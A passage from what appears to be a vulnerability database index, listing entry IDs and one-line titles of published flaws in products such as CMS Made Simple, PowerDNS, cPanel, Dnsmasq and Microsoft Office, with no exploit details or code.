SP1/2016/2019 privilege escalation [139863] simple-job-board Plugin up to 2.4.3 on WordPress Keyword Search Reflected cross site scripting [139849] simple-fields Plugin up to 1.4.10 on WordPress cross site scripting [139804] simple-membership Plugin up to 3.5.6 on WordPress cross site scripting [139792] simple-share-buttons-adder plugin up to 5.x on WordPress cross site scripting [139730] Lightbox Plus Colorbox Plugin up to 2.7.2 on WordPress admin.php cross site request forgery [139634] Simple Travis Pipeline Runner Plugin up to 1.0 on Jenkins Custom Script Security Whitelist 7PK Security Features [139282] cPanel up to 68.0.14 DNS Zone SOA Record privilege escalation [139275] Dnsmasq up to 2.75 DNS Server memory corruption [139242] cPanel up to 70.0.22 WHM Reset a DNS Zone Stored cross site scripting [139240] cPanel up to 70.0.22 WHM Edit DNS Zone Stored cross site scripting [139230] cPanel up to 70.0.22 WHM Synchronize DNS Record Stored cross site scripting [139229] cPanel up to 70.0.22 WHM DNS Cleanup Stored cross site scripting [139228] cPanel up to 70.0.22 WHM Delete a DNS Zone Stored cross site scripting [139227] cPanel up to 70.0.22 HM Edit DNS Zone Stored cross site scripting [139225] cPanel up to 70.0.22 WHM DNS Cluster Stored cross site scripting [139222] cPanel up to 70.0.22 WHM Edit DNS Zone Stored cross site scripting [139188] cPanel up to 11.53.x DNS NS Entry privilege escalation [139154] cPanel up to 55.9999.140 DNS NS Entry privilege escalation [139036] PowerDNS Authoritative Server up to 4.0.7/4.1.8 NOTIFY Message denial of service [139035] PowerDNS Authoritative Server up to 4.0.7/4.1.9 Record privilege escalation [138989] Custom Simple Rss Plugin 2.0.6 on WordPress cross site request forgery [138972] cPanel up to 76.0.7 DNS Zone Stored cross site scripting [138888] Simple Membership Plugin up to 3.8.4 on WordPress Bulk Operation Section cross site request forgery [138841] simple_captcha2 Gem 0.2.3 on Ruby privilege escalation [138319] gdnsd 3.2.0 zscan_rfc1035.rl set_ipv6 memory corruption [138318] gdnsd 3.2.0 zscan_rfc1035.rl set_ipv4 memory corruption [137572] Microsoft Excel 365 ProPlus/2019 information disclosure [137571] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137570] Microsoft Excel 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [137569] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 JavaScript privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [136661] Sony Bravia TV up to 8.587 Photo Sharing Plus memory corruption [136660] Sony Bravia TV up to 8.587 Photo Sharing Plus directory traversal [136659] Sony Bravia TV up to 8.587 Photo Sharing Plus privilege escalation [136653] Samba up to 4.10.4 AD DC DNS Management Server denial of service [136332] Microsoft Office 365 ProPlus/2016/2019 Word memory corruption [136331] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [135642] CMS Made Simple up to 2.2.10 Persistent cross site scripting [135362] GetSimple CMS up to 3.3.15 theme-edit.php privilege escalation [134697] Microsoft Office/Word 365 ProPlus/2016/2019 memory corruption [134379] F5 BIG-IP up to 11.5.8/11.6.3.4/12.1.4/13.1.1.4/14.1.0.1 DNS Query privilege escalation [134313] Zoho ManageEngine Firewall Analyzer up to 12.2 DNS Name Stored cross site scripting [134184] Sony Smart TV Photo Sharing Plus LJYT0010.JPG Credentials information disclosure [134183] Sony Smart TV Photo Sharing Plus Credentials information disclosure [134047] CMS Made Simple up to 2.2.10 File Manager Reflected cross site scripting [133856] Sony Smart TV Photo Sharing Plus information disclosure [133367] CMS Made Simple 2.2.8 FrontEndUsers class.FrontEndUsersManipulate.php privilege escalation [133184] Microsoft Office 365 ProPlus/2016 for Mac/2019 Graphics Component memory corruption [133151] Wireshark 3.0.0 TSDNS Dissector packet-tsdns.c denial of service [132468] CMS Made Simple 2.2.8 ModuleManager action.installmodule.php Unserialize privilege escalation [132467] CMS Made Simple 2.2.8 Administrator Account privilege escalation [132466] CMS Made Simple 2.2.8 Administrator Page changegroupperm.php privilege escalation [132465] CMS Made Simple 2.2.8 filepicker privilege escalation [132464] CMS Made Simple 2.2.8 DesignManager action.admin_bulk_css.php Unserialize privilege escalation [132463] CMS Made Simple up to 2.2.8 News Module Time-Based sql injection [132439] CMS Made Simple 2.2.10 My Preferences myaccount.php cross site scripting [132438] CMS Made Simple 2.2.10 News Module moduleinterface.php cross site scripting [132437] CMS Made Simple 2.2.10 Layout Design Manager cross site scripting [132150] CMS Made Simple 2.2.10 New Profile moduleinterface.php cross site scripting [132106] PowerDNS Authoritative Server up to 4.0.6/4.1.6 HTTP Connector privilege escalation [132042] WP Support Plus Responsive Ticket System 9.1.1 on WordPress submit_ticket.php Stored cross site scripting [131983] CUJO Smart Firewall 7003 mdnscap memory corruption [131982] CUJO Smart Firewall 7003 mdnscap memory corruption [131981] CUJO Smart Firewall mdnscap memory corruption [131576] CMS Made Simple up to 2.2.9 class.showtime2_data.php sql injection [131575] CMS Made Simple up to 2.2.9 Watermark class.showtime2_image.php privilege escalation [131432] Miek Gieben DNS Library up to 1.0.9 scan_rr.go setTA denial of service [131417] Simple Machines Forum 2.0.4 index.php privilege escalation [131416] Simple Machines Forum 2.0.4 index.php cross site scripting [131415] Simple Machines Forum 2.0.4 install.php directory traversal [131111] PHP up to 7.1.25/7.2.13/7.3.1 DNS Response ext/standard/dns.c dns_get_record information disclosure [130785] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Security Feature Phishing 7PK Security Features [130316] PowerDNS Recursor up to 4.1.8 DNSSEC Validator weak authentication [130315] PowerDNS Recursor 4.1.4/4.1.5/4.1.6/4.1.7/4.1.8 Lua Hook 7PK Security Features [129818] ISC BIND up to 9.11.4/9.12.2 DDNS 7PK Security Features [128762] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 Word privilege escalation [128744] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128743] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 information disclosure [128732] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 MSHTML Engine privilege escalation [128706] GNU binutils 2.31.1 libiberty cplus-dem.c demangle_template memory corruption [128583] GetSimple CMS 3.3.12 admin/edit.php Stored cross site scripting [128421] CMS Made Simple 2.2.8 admin/myaccount.php Reflected cross site scripting [128117] CMS Made Simple 2.2.8 File Upload cross site scripting [128071] Nagios XI up to 5.5.7 magpie_simple.php cross site scripting [127921] HAProxy up to 1.8.14 dns.c denial of service [127920] HAProxy up to 1.8.14 dns.c dns_validate_dns_response information disclosure [127809] Microsoft PowerPoint 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [127646] Amazon Web Services FreeRTOS DNS Response xProcessReceivedUDPPacket/prvParseDNSReply privilege escalation [127642] Amazon Web Services FreeRTOS DNS LLMNR Packet prvParseDNSReply memory corruption [127409] PowerDNS Recursor up to 4.1.7 information disclosure [127296] PowerDNS Authoritative Server/Recursor up to 4.1.4 Cache Data Processing Error [127291] PowerDNS Authoritative Server/PowerDNS Recursor denial of service [127272] Samba 4.9.0/4.9.1/4.9.2 DNS Zone denial of service [127126] PowerDNS dnsdist up to 1.3.2 privilege escalation [126831] Digium Asterisk up to 15.6.1/16.0.0 DNS SRV/NAPTR Lookup memory corruption [126748] Microsoft Office 365 ProPlus/2019 Outlook Message information disclosure [126734] Microsoft Office 365 ProPlus/2019 information disclosure [126715] Microsoft Office 365 ProPlus/2016/2019 Excel memory corruption [126614] PowerDNS Recursor up to 4.1.4 DNSSEC Validator privilege escalation [126386] PowerDNS Authoritative Server up to 3.4.10/4.0.1 Zone memory corruption [126053] Douchat 4.0.4 Data\notify.php simplexml_load_string XML External Entity [125845] DeDeCMS 5.7 plus/qrcode.php cross site scripting [125781] GNU binutils 2.31 GNU libiberty cplus-dem.c get_count memory corruption [125302] CMS Made Simple 2.2.7 Article moduleinterface.php cross site scripting [125301] CMS Made Simple 2.2.7 Article moduleinterface.php cross site scripting [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [124755] Zahir Accounting Enterprise Plus up to 10b CSV File memory corruption [124628] GetSimple CMS 3.3.15 admin/settings.php Stored cross site scripting [124370] DeDeCMS 5.7 /plus/feedback_ajax.php cross site scripting [124232] Foscam C1 Indoor HD Camera 2.52.2.43 DDNS Client memory corruption [124138] Foscam C1 Indoor HD Camera 2.52.2.43 DDNS Client memory corruption [124137] Foscam C1 Indoor HD Camera 2.52.2.43 DDNS Client memory corruption [124136] Foscam C1 Indoor HD Camera 2.52.2.43 DDNS Client memory corruption [124111] GetSimple CMS 3.3.13 admin/settings.php cross site request forgery [124082] D-Link DIR-816 A2 1.10 B05 /goform/DDNS handler memory corruption [123953] D-Link DIR-600M Dynamic DNS Configuration Page cross site scripting [123892] PowerDNS/PowerDNS Recursor TSIG Signature privilege escalation [123891] PowerDNS/PowerDNS Recursor TSIG Signature privilege escalation [123888] PowerDNS/PowerDNS Recursor DNS Server denial of service [123797] PowerDNS Authoritative Server up to 3.4.10/4.0.1 Web Server denial of service [123479] GetSimple CMS 3.4.0.9 admin/edit.php cross site scripting [123234] GetSimple CMS 3.3.14 admin/edit.php cross site scripting [123032] daveismyname simple-cms up to 2014-03-11 admin/addpage.php cross site request forgery [123031] daveismyname simple-cms up to 2014-03-11 admin/ cross site request forgery [122962] OpenEMR up to 5.0.1.3 Anything_simple.php sql injection [122263] PowerDNS Recursor up to 4.0.7 denial of service [122251] Linux Kernel up to 4.17.10 HFS+ File System fs/hfsplus/dir.c hfsplus_lookup denial of service [122196] F5 BIG-IP DNS up to 12.1.3.5/13.1.0.7 DNS Message 7PK Security Features [122059] mitmproxy 4.0.3 tools/web/app.py DNS Rebinding privilege escalation [122058] joyplus-cms 1.6.0 manager/admin_ajax.php sql injection [122057] joyplus-cms 1.6.0 collect_vod_zhuiju.php cross site scripting [121957] joyplus-cms 1.6.0 manager/admin_ajax.php sql injection [121956] joyplus-cms 1.6.0 manager/admin_ajax.php cross site scripting [121533] joyplus-cms 1.6.0 File Upload upload.php privilege escalation [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [120077] GNU binutils 2.30 GNU libiberty cplus-dem.c denial of service [120019] joyplus-cms 1.6.0 System Manage admin_player.php cross site scripting [119833] GNU binutils 2.30 GNU libiberty cplus-dem.c demangle_templat denial of service [119832] GNU binutils 2.30 GNU libiberty cplus-dem.c work_stuff_copy_to_from denial of service [119808] GNU binutils 2.30 GNU libiberty cplus-dem.c denial of service [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [119256] joyplus-cms 1.6.0 manager/index.php sql injection [119198] simplehttpserver on Node.js cross site scripting [119101] http_static_simple on Node.js URL directory traversal [119068] Dns-sync on Node.js resolve privilege escalation [119052] node-simple-router on Node.js URL directory traversal [118923] gomeplus-h5-proxy on Node.js directory traversal [118438] jwt-simple up to 0.3.0 on Node.js jwt.decode weak encryption [118083] Wireshark up to 2.6.0 DNS Dissector packet-dns.c denial of service [117892] Node.js 6.x DNS DNS Rebinding 7PK Security Features [117186] CMS Made Simple up to 2.2.7 action.ajax_get_templates.php information disclosure [117185] CMS Made Simple up to 2.2.7 Admin Dashboard file_get_contents information disclosure [117184] CMS Made Simple up to 2.2.7 Admin Dashboard config.php privilege escalation [117183] CMS Made Simple up to 2.2.7 Admin Dashboard lib/ privilege escalation [117182] CMS Made Simple up to 2.2.7 tmp/ privilege escalation [117181] CMS Made Simple up to 2.2.7 Admin Dashboard lib/ privilege escalation [117180] CMS Made Simple up to 2.2.7 Admin Dashboard privilege escalation [117179] CMS Made Simple up to 2.2.7 Admin Dashboard config.php information disclosure [117178] CMS Made Simple up to 2.2.7 Admin Dashboard privilege escalation [117010] tinysvcmdns Library 2016-07-18 memory corruption [116985] Simple Machines Forum up to 2.0.14 Access Restriction PersonalMessage.php MessageSearch2 privilege escalation [116982] CMS Made Simple 2.2.7 admin/checksum.php directory traversal [116190] joyplus-cms 1.6.0 admin_ajax.php cross site scripting [116188] CMS Made Simple up to 2.2.7 Dashboard eval privilege escalation [116187] CMS Made Simple up to 2.2.6 class.LoginOperations.php get_data privilege escalation [116186] CMS Made Simple up to 2.2.6 weak encryption [116185] CMS Made Simple up to 2.2.7 filepicker directory traversal [116184] CMS Made Simple up to 2.2.7 /index.php Path information disclosure [116183] CMS Made Simple up to 2.2.6 Password Reset privilege escalation [116180] joyplus-cms 1.6.0 manager/admin_vod.php cross site scripting [116107] CMS Made Simple 2.2.7 admin/siteprefs.php Stored cross site scripting [116106] CMS Made Simple 2.2.7 moduleinterface.php Reflected cross site scripting [116105] CMS Made Simple 2.2.7 moduleinterface.php cross site request forgery [116104] CMS Made Simple 2.2.7 admin/siteprefs.php cross site request forgery [116103] CMS Made Simple 2.2.7 moduleinterface.php Reflected cross site scripting [116102] joyplus-cms 1.6.0 install/ information disclosure [115512] GetSimple CMS 3.3.13 uploadify.swf cross site scripting [115284] GNU binutils 2.29/2.30 cplus-dem.c denial of service [114753] joyplus-cms 1.6.0 admin_ajax.php cross site scripting [114752] joyplus-cms 1.6.0 File Upload upload.php privilege escalation [114712] UnboundID LDAP SDK Access Control SimpleBindRequest privilege escalation [114630] joyplus-cms 1.6.0 admin_ajax.php cross site request forgery [114585] Pradeep Makone Support Plus Responsive Ticket System up to 9.0.2 on WordPress Cookie sql injection [114447] CMS Made Simple 2.2.5 cross site request forgery [114393] CMS Made Simple 2.2.5 File Manager privilege escalation [114367] CMS Made Simple 2.2.6 moduleinterface.php cross site scripting [114363] CMS Made Simple 2.2.6 moduleinterface.php Stored cross site scripting [114106] Kubik-Rubik Simple Image Gallery Extended 3.2.3 on Joomla JPEG File sige.php htmlImageAddTitleAttribute cross site scripting [113983] F5 BIG-IP up to 11.6.1/11.6.2/12.1.3.1/13.0.0 TCP DNS Profile Hanlder denial of service [113840] CMS Made Simple 2.1.6 Installation index.php privilege escalation [113518] SimpleCalendar 3.1.9 on Joomla sql injection [112444] CMS Made Simple 2.2.5 moduleinterface.php cross site scripting [112443] CMS Made Simple 2.2.5 moduleinterface.php cross site scripting [112442] CMS Made Simple 2.2.5 admin/addbookmark.php cross site scripting [112337] Dnsmasq 2.78 DNSSEC privilege escalation [112335] PowerDNS Recursor up to 4.0.6 DNSSEC Parser denial of service [112334] PowerDNS Recursor up to <=3.7.4 API privilege escalation [112333] PowerDNS Recursor up to 4.0.6 Web Interface cross site scripting [112332] PowerDNS Authoritative Server up to <=3.4.11 API privilege escalation [112331] PowerDNS Recursor up to 4.0.6 DNSSEC Validator weak authentication [112287] PowerDNS 4.1.0 DNSSEC Validator privilege escalation [112241] tinysvcmdns Library 2017-11-05 DNS Query denial of service [111747] TP-LINK WVR/WAR/ER phddns.lua privilege escalation [111744] TP-LINK WVR/WAR/ER cmxddns.lua privilege escalation [111382] Simple Download Monitor Plugin up to 3.5.3 on WordPress wp-admin/post.php cross site scripting [111381] Simple Download Monitor Plugin up to 3.5.3 on WordPress wp-admin/post.php cross site scripting [111256] CMS Made Simple 2.1.6/2.2 Smarty Template privilege escalation [110779] CMS Made Simple up to 2.2.4 Login Cache information disclosure [110778] CMS Made Simple up to 2.2.4 Login Cache information disclosure [110772] DeDeCMS up to 5.7 plus/recommend.php sql injection [110771] DeDeCMS up to 5.7 plus/flink_add.php sql injection [110598] Simple Chatting System 1.0 File Upload view/my_profile.php privilege escalation [110119] sDNSProxy.exe up to ver1.1.0.0 privilege escalation [109662] UpdraftPlus Plugin up to 1.13.12 on WordPress admin.php plupload_action privilege escalation [109661] UpdraftPlus Plugin up to 1.13.12 on WordPress admin.php updraft_ajax_handler privilege escalation [109296] CMS Made Simple 2.2.3.1 action.addcategory.php Stored cross site scripting [109295] CMS Made Simple 2.2.3.1 Access Restriction action.upload.php is_file_acceptable cross site scripting [109286] CMS Made Simple 2.2.2 Reflected cross site scripting [109285] CMS Made Simple 2.1.6 Template privilege escalation [108728] Simple ASC Content Management System 1.2 guestbook.asp sign cross site scripting [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107417] Dnsmasq up to 2.77 DNS Response memory corruption [107358] Dnsmasq up to 2.77 DNS Request add_pseudoheader memory corruption [107357] Dnsmasq up to 2.77 DNS Response denial of service [107356] Dnsmasq up to 2.77 DHCPv6 Forwarded Request Memory information disclosure [107355] Dnsmasq up to 2.77 DHCPv6 Request memory corruption [107354] Dnsmasq up to 2.77 IPv6 Router Advertisement memory corruption [107351] Dnsmasq up to 2.77 DNS Packet Size privilege escalation [107212] TeamWork TicketPlus updateProfile privilege escalation [107180] Simple Student Result Plugin up to 1.6.3 on WordPress functions.php fn_ssr_add_st_submit weak authentication [106895] Simple Ads Manager Plugin 2.5.94/2.5.96 on WordPress information disclosure [106880] YADIFA up to 2.2.5 DNS Packet Parser denial of service [106610] tcpdump up to 4.9.1 DNS Parser print-domain.c ns_print denial of service [106302] FFmpeg 3.3.3 libavformat/asfdec_f.c asf_build_simple_index denial of service [106176] GNU C Library up to 2.25 DNS Stub Resolver Data Processing Error [106155] simple-php-captcha information disclosure [106141] ConnMan Project Connection Manager Daemon up to 1.34 DNS Packet memory corruption [106051] RubyGems up to 2.6.12 GEM Install DNS privilege escalation [104733] GNU C Library up to 2.25 EDNS Support Data Processing Error [104383] Palo Alto PAN-OS up to 6.1.17/7.0.15/7.1.10/8.0.2 DNS Proxy privilege escalation [103714] CMS Made Simple 2.2.2 moduleinterface.php. privilege escalation [103713] CMS Made Simple 2.2.2 moduleinterface.php. privilege escalation [103619] GetSimple CMS up to 3.3.13 /admin/index.php Reflected cross site scripting [102906] GetSimple CMS 3.x Profile admin/profile.php cross site scripting [102648] CMS Made Simple 2.1.6 XSS Filter admin\addgroup.php cross site scripting [102584] Financial Plus Mobile Banking App 3.0.3 on iOS X.509 Certificate weak authentication [102542] Rockwell Automation PanelView Plus 6.00/6.10/7.00/8.00 privilege escalation [102179] Simple Keitai Chat up to 2.0 cross site scripting [101896] Wireshark up to 2.2.6 DNS Dissector packet-dns.c denial of service [101824] Contiki Operating System 3.0 httpd-simple.c memory corruption [101100] CMS Made Simple 2.1.6 admin/editusertag.php CreateTagFunction/CallUserTag privilege escalation [101026] Microsoft Windows DNS Server privilege escalation [100949] ISC BIND on Red Hat Linux DNSSEC Reachable Assertion [100890] IBM WebSphere Cast Iron 7.0.0/7.5.0.0 DNS/HTTP privilege escalation [100761] GetSimple CMS 3.3.13 CSRF Prevention template_functions.php weak encryption [100636] Simple PHP File Manager index.php directory traversal [100407] Cisco ASA DNS denial of service [99867] ISC BIND up to 9.11.1rc1 DNS64 State privilege escalation [99180] Huawei Tecal RHXXXX DNS Packet Data Processing Error [98524] CMS Made Simple 2.1.6 cross site scripting [98523] CMS Made Simple 2.1.6 cross site scripting [98522] CMS Made Simple 2.1.6 cross site scripting [98241] GetSimple CMS 3.3.4 anonymous_data.php information disclosure [98240] GetSimple CMS 3.3.4 <username>.xml information disclosure [98160] Netgear DGN2200 up to 10.0.0.50 dnslookup.cgi cross site request forgery [98056] Microsoft Windows up to Server 2016 DNS Query information disclosure [97738] CMS Made Simple 2.1.6 Settings cross site scripting [97737] CMS Made Simple 2.1.6 moduleinterface.php cross site scripting [97547] Netgear DGN2200 up to 10.0.0.50 dnslookup.cgi privilege escalation [97372] Simple Ads Manager Plugin on WordPress privilege escalation [97168] CMS Made Simple up to 1.x defaultadmin information disclosure [97167] CMS Made Simple up to 1.x Form Builder exportxml information disclosure [97166] CMS Made Simple up to 1.x Form Builder admin_store_form information disclosure [96827] ISC BIND up to <=9.9.9-S7 RPZ/DNS64 State Error denial of service [96763] Simple Machines Forum 2.1 LogInOut.php privilege escalation [96762] Simple Machines Forum 2.1 Packages.php privilege escalation [95761] Pirelli DRG A115 v3 ADSL Router DNS privilege escalation [95358] CMS Made Simple up to 2.1.5 admin/adduser.php cross site request forgery [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC privilege escalation [95191] WordPress WP Support Plus Responsive Ticket System 7.1.3 on WordPress wp_set_auth_cookie privilege escalation [94754] simple-image-manipulator Plugin 1.0 on WordPress privilege escalation [94612] Samba up to 4.3.12/4.4.7/4.5.2 NDR Parsing ndr_pull_dnsp_name memory corruption [93732] Zoho ManageEngine OpManager 12100/12200 DNS Name cross site scripting [93265] Django CMS up to 1.8.15/1.9.10/1.10.2 Host Header DNS privilege escalation [92744] Oracle Database Server 11.2.0.4/12.1.0.2 RDBMS Security/SQLPlus information disclosure [92282] Cisco IOS/IOS XE DNS Forwarder privilege escalation [92197] PowerDNS Authoritative Server up to 4.0.0 AXFR/IXFR Response denial of service [92096] Apple macOS up to 10.11 mDNSResponder information disclosure [91889] Cisco Cloud Services Platform 2100 2.0 dnslookup privilege escalation [91409] PowerDNS up to 3.4.9 Authoritative Server Query denial of service [91408] PowerDNS up to 3.4.9 Authoritative Server Query denial of service [91257] Simple Machine Forum v1.1.10 ManageMembers.php sql injection [91034] Let's PHP! Simple Chat cross site scripting [90839] MailEnable up to 1.8 DNS Response denial of service [90221] PHP up to 5.5.37/5.6.23/7.0.8 XMLRPC simplestring.c simplestring_addn memory corruption [88655] Microsoft Windows 2000 DNS Server privilege escalation [88614] SimpleChat User information disclosure [88494] Dnsmasq up to 2.75 Reply privilege escalation [88198] Microsoft Windows DNS Server privilege escalation [88090] Apple AirPort up to 7.6.6/7.7.6 DNS memory corruption [87940] Microsoft Windows Server 2012/Server 2012 R2 DNS Server memory corruption [87709] Moxa UC-7408 LX-Plus 7PK Security Features [87701] GNU C Library up to 2.23 nss_dns getnetbyname memory corruption [87630] CMS Made Simple up to 1.12.1/2.1.2 Smarty Cache cross site scripting [86901] Simple PHP Guestbook guestbook.php cross site scripting [86458] CMS Made Simple cross site scripting [86104] PhpBB Plus lang_admin_album.php privilege escalation [86103] PhpBB Plus lang_main_album.php privilege escalation [85575] Exponent CMS magpie_simple.php cross site scripting [84609] iManage CMS themes/simple.php privilege escalation [84582] SimpleBoard file_upload.php privilege escalation [84041] Knowledgetree Open Source search/simpleSearch.php cross site scripting [83029] Simple PHP Blog colors.php cross site scripting [83028] Simple PHP Blog preview_static_cgi.php cross site scripting [82572] Simple Machines Forum SMF index.php sql injection [82386] libvirt up to 0.9.8 DNS/DHCP Query network/bridge_driver.c networkReloadIptablesRules privilege escalation [82189] libxml2 DNS Reply xmlNanoFTPConnect memory corruption [82103] Mambo mambosimple.php cross site scripting [82017] Symantec Firewall DNS Kernel memory corruption [81954] cPanel dnslook.html cross site scripting [81318] Samba up to 4.4.0rc3 DNS TXT Record memory corruption [80760] nginx 0.6.18/1.9.9 DNS CNAME Record denial of service [80759] nginx 0.6.18/1.9.9 DNS CNAME Record memory corruption [80758] nginx 0.6.18/1.9.9 DNS UDP Packet denial of service [80752] Huawei E5186 4G LTE Router DNS Query Packet privilege escalation [80063] Wireshark up to 1.12.8 DNS Dissector packet-dns.c dissect_dns_answer privilege escalation [79917] Netgear WNR1000v3 1.0.2.68 DNS Query Port weak encryption [79492] Microsoft Windows DNS memory corruption [79232] PowerDNS Authoritative Server 3.4.4/3.4.5/3.4.6 Query Packet privilege escalation [78992] PowerDNS Recursor/Authoritative Server Label Decompressor denial of service [78720] Cisco ASA 1000V/5000 DNS Response denial of service [78718] Cisco ASA 1000V/5000 DNS Response denial of service [77657] Cisco Web Security Appliance 8.0.6-078/8.0.6-115 DNS Processer denial of service [77551] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 DNSSEC Key buffer.c privilege escalation [76828] LEMON-S PHP Gazou BBS Plus up to 2.35 Image File privilege escalation [76658] Cisco Email Security Appliance 8.5.6-106/9.5.0-201 DNS TXT Record privilege escalation [76410] LEMON-S PHP Simple Oekaki BBS up to 1.20 index.php File directory traversal [76409] LEMON-S PHP Simple Oekaki BBS up to 1.20 index.php cross site scripting [76183] GetSimple CMS up to 3.3.5 admin/filebrowser.php cross site scripting [76182] GetSimple CMS up to 3.3.5 admin/edit.php cross site scripting [76069] RubyGems up to 2.0.15/2.2.3/2.4.6 DNS 7PK Security Features [75500] Simple PHP Agenda up to 2.2.8 cross site request forgery [75432] PowerDNS Recursor up to 3.7.2 Recursive Query denial of service [75228] Dnsmasq up to 2.73rc3 tcp_request Data Processing Error [75092] GNU C Library DNS Response dns-host.c getanswer_r memory corruption [75037] Simple Ads Manager Plugin up to 2.5.95 on WordPress sam-ajax-admin.php privilege escalation [74671] Cisco ASA DNS privilege escalation [74655] Simple Ads Manager Plugin 2.5.94/2.5.96 on WordPress sql injection [74581] Synology DiskStation Manager up to 3.0 mDNS Responder information disclosure [74348] Maroyaka Simple Board cross site scripting [74286] GNU C Library up to 2.19 DNS Implementation denial of service [74121] Cisco IOS/IOS XE Multicast DNS Gateway privilege escalation [73707] GetSimple CMS up to 3.3.4 XML External Entity [73185] PowerDNS Recursor up to 3.6.0 denial of service [71880] Drupal SimpleCorp 7.x-1.0 cross site scripting [71355] PowerDNS PowerDNS Recursor denial of service [70201] EnvialoSimple Email Marketing Y Newsletters up to 1.96 cross site scripting [70189] pfSense 2.1.3 diag_dns.php privilege escalation [70118] WP SimpleMail 1.0.6 cross site scripting [69696] GetSimple CMS 3.3.1 cross site scripting [69676] Foscam IP camera 11.37.2.49 DNS Server privilege escalation [69657] Tipsandtricks-hq WordPress Simple Paypal Shopping Cart up to 1.8 cross site request forgery [69530] Simplemachines Forum up to 2.0.6 privilege escalation [69529] Simplemachines Forum up to 1.1.4 privilege escalation [69528] Simplemachines Forum up to 1.1.4 X-Frame-Options privilege escalation [69088] Trend Micro Antivirus Plus/Internet Security/Maximum Security tmeext.sys privilege escalation [66584] Abeel Simple PHP Agenda up to 0.2.0 edit_event.php sql injection [66538] CMS Made Simple up to 1.0.2 sql injection [66496] CMS Made Simple 1.11.10 editorFrame.php cross site scripting [66491] CMS Made Simple cross site scripting [66109] GetSimple CMS 3.1.2/3.2.3 edit.php cross site scripting [66096] GetSimple CMS up to 3.2.3 cross site scripting [65704] CMS Made Simple 1.11.9 cross site scripting [65356] Simplemachines Forum up to 1.0.15 File Upload privilege escalation [65269] CMS Made Simple up to 1.11.2 cross site scripting [65074] Cdsincdesign Simple Dropbox Upload Form up to 1.8.6 File Upload multi.php privilege escalation [64133] Wppa.opajaap Wp-photo-album-plus 5.0.0/5.0.1/5.0.2 cross site scripting [63685] Thekelleys Dnsmasq up to 2.63 Interfaces denial of service [63684] Thekelleys Dnsmasq up to 2.32 Interfaces denial of service [63140] CMS Made Simple up to 1.5.0 images.php directory traversal [63115] CMS Made Simple up to 1.5.1 images.php cross site request forgery [61510] Martin Nagy bind-dyndb-ldap 0.1.0/0.2.0/1.0.0/1.1.0 DNS Server dns_to_ldap_dn_escape privilege escalation [61056] Cms-center Simple Web Content Management System 1.1 item_delete.php sql injection [60810] Simple PHP Agenda 2.2.8 engine.php sql injection [60580] CMS Made Simple up to 1.5.1 cross site scripting [60244] PowerDNS PowerDNS Recursor 3.3 unknown vulnerability [60242] Daniel J. Bernstein djbdns 1.05 privilege escalation [60241] PowerDNS common_startup.cc denial of service [60131] Simple-groupware SimpleGroupware 0.742 cross site scripting [59840] Alexander Palmo Simple PHP Blog 0.7.0 delete.php cross site scripting [59779] PukiWiki Pukiwiki Plus! up to 1.47 cross site scripting [59489] GetSimple CMS 2.01 cross site scripting [59461] phpMyAdmin up to 3.4.7 Libraries simplexml_load_string information disclosure [59290] Cafuego Simple Document Management System 1.1.6 detail.php sql injection [58854] GetSimple CMS 2.01 cross site scripting [58619] CMS Made Simple 1.9.2 Error Message information disclosure [57802] Reallysimplechat Really Simple Chat 3.3 cross site scripting [57794] Reallysimplechat Really Simple Chat 3.3 sql injection [57793] Reallysimplechat Really Simple Chat 3.3 dereferer.php cross site scripting [57604] CMS Made Simple up to 1.0.1 unknown vulnerability [55616] Devbits Register-plus up to 3.5.1 on WordPress wp-login.php cross site scripting [54966] Squid Proxy 3.1.6 dns_internal.cc denial of service [54959] CMS Made Simple up to 1.5.1 cross site request forgery [54958] CMS Made Simple up to 1.5.1 cross site request forgery [54957] CMS Made Simple up to 1.5.1 cross site scripting [54953] CMS Made Simple up to 1.0.1 translation.functions.php directory traversal [54901] Dustincowell Free Simple CMS 1.0 Themes themes/default/index.php privilege escalation [54887] Dustincowell Free Simple CMS up to 1.0 Themes privilege escalation [54477] Mono-project libgdiplus 2.6.7 tiffcodec.c gdip_read_bmp_image Numeric Error [53167] CMS Made Simple up to 1.0.1 cross site scripting [52942] 8pixel Simple Blog 4.0 App_Data/sb.mdb privilege escalation [52261] Sk-typo3 Sk Simplegallery up to 0.0.1 cross site scripting [52260] Sk-typo3 Sk Simplegallery up to 0.0.1 sql injection [52100] Sanusart Simple PHP Guestbook 1.0 guestbook.php cross site scripting [51655] ISC BIND up to 9.3.3 DNS Cache unknown vulnerability [51586] TYPO3 Bb Simplejobs up to 0.1.0 sql injection [51473] PowerDNS Recursor up to 3.1.7.2 weak authentication [51472] PowerDNS Recursor up to 3.1.7.2 memory corruption [51303] Alexander Palmo Simple PHP Blog up to 0.5.1 languages_cgi.php directory traversal [50913] ISC BIND up to 9.3.0 DNS Cache unknown vulnerability [50884] Downstairs.dnsalias Home FTP Server 1.10.1.139 File Upload directory traversal [50882] Downstairs.dnsalias Home FTP Server 1.10.1.139 privilege escalation [50304] Gotdns Loggix Project up to 9.3.28 Calendar.php privilege escalation [50281] IBM Lotus Connections 2.0.1 simpleSearch.do cross site scripting [49779] Thekelleys dnsmasq up to 2.32 tftp.c tftp_request denial of service [49778] Thekelleys dnsmasq up to 2.32 tftp.c 